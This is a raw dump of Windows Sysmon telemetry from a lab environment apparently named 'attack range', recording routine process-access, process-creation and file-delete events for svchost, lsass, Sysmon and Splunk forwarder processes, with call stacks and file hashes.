Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1904-6216-3A05-000000003902}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1904-6216-3A05-000000003902}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.806{4F8D34B0-1904-6216-3A05-000000003902}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.540{4F8D34B0-1904-6216-3905-000000003902}31723616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.337{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6BCBB5F16660BDD92789EEAEAC02635,SHA256=D9FF306E977670BD5CAE88B8B3F1667CEB6492F1125945E314D4D79131E44714,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:44.637{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000222380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1904-6216-3905-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1904-6216-3905-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.180{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1904-6216-3905-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.182{4F8D34B0-1904-6216-3905-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.987{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.889{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.867{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.720{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 